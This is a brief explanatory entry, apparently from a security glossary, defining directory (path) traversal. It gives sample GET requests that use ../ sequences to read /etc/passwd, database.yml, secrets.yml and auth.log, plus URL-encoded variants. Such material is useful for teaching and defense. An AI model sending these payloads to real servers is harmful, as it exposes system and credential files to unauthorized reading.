Directory Traversal is synonymous with Path Traversal - a vulnerability that allows attackers to navigate outside the web root or intended directory structure to access arbitrary files on the server using path manipulation sequences.
By injecting directory navigation sequences (../ or ..\) into file path parameters, attackers can climb out of restricted directories and access sensitive files anywhere on the filesystem that the application has permission to read.
# File download endpoints
GET /download?file=../../../../etc/passwd
# Image/document viewers
GET /view?doc=../../../config/database.yml
# Template inclusion
GET /page?template=../../../app/secrets.yml
# Log file viewers
GET /logs?file=../../var/log/auth.log
../ sequences%2e%2e/, %2e%2e%5c